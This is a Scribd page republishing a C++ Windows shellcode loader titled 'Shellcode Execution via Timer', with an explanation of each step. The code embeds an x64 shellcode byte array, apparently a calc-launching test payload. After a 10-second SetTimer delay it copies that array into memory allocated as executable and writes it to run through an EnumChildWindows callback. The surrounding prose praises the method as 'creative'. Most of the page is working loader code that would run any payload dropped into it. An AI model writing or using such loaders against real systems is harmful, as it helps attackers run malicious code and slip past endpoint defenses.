Scribd
Upload
15 views

Shellcode Execution Via Timer

The code sets a timer to execute a callback function after 10 seconds. The callback function allocates executable memory, copies shellcode into it, and attempts to execute the shellcode. This is a creative way to execute shellcode on a timer delay without using additional processes or threads.

Uploaded by

Ousmane
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
15 views

Shellcode Execution Via Timer

The code sets a timer to execute a callback function after 10 seconds. The callback function allocates executable memory, copies shellcode into it, and attempts to execute the shellcode. This is a creative way to execute shellcode on a timer delay without using additional processes or threads.

Uploaded by

Ousmane
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Shellcode Execution via Timer

C++ Code
#include <windows.h>

// TimeProc Declaration
VOID CALLBACK TimerProc(HWND hWnd, UINT message, UINT_PTR timerId, DWORD dwTime);

// Shellcode declaration
char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x00";

int main(){
// Set Timer to execute TimerProc in 10 seconds
UINT_PTR timerId = SetTimer(NULL, 1, 10000, TimerProc);

// Message Loop
MSG msg;
while (GetMessage(&msg, NULL, 0, 0)){
TranslateMessage(&msg);
DispatchMessage(&msg);
}
KillTimer(NULL, timerId);
return 0;
}

// Function Executed by TimerProc


VOID CALLBACK TimerProc(HWND hWnd, UINT message, UINT_PTR timerId, DWORD dwTime){
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumChildWindows((HWND) NULL,(WNDENUMPROC) hAlloc,NULL);
}

This code is a Windows program that sets a timer to execute a function (TimerProc) after a delay of 10 seconds.
The TimerProc function allocates memory, copies shellcode into it, and then attempts to execute the shellcode.
Let's break down the key components and explain its functionality:

1. Shellcode:

◦ The char shellcode[] array contains shellcode in hexadecimal representation. Shellcode is typically a small
piece of code used in various contexts, including penetration testing and exploitation.

2. Timer Function:

◦ TimerProc is a callback function that is called when the timer expires. It takes four parameters: hWnd,
message, timerId, and dwTime. In this code, it is used to allocate memory, copy the shellcode into it,
and attempt to execute it.

3. Memory Allocation:

◦ Inside TimerProc, it uses VirtualAlloc to allocate memory with the MEM_COMMIT | MEM_RESERVE flags and
PAGE_EXECUTE_READWRITE protection. This means the allocated memory is both executable and readable.

4. Shellcode Copy:

◦ The shellcode is then copied into the allocated memory using memcpy.

5. Execution Attempt:

◦ The code attempts to execute the shellcode using EnumChildWindows, passing the allocated memory as a
callback function. This is a creative way to attempt to execute the shellcode.

6. Main Function:

◦ In the main function, a timer is set to execute TimerProc after a 10-second delay using SetTimer.
This sets the stage for the execution of the shellcode.

7. Message Loop:

◦ The program enters a message loop using GetMessage, TranslateMessage, and DispatchMessage. This loop
keeps the program running until a message is received.

8. Timer Cleanup:

◦ After the timer expires and TimerProc is executed, the timer is killed using KillTimer.

You might also like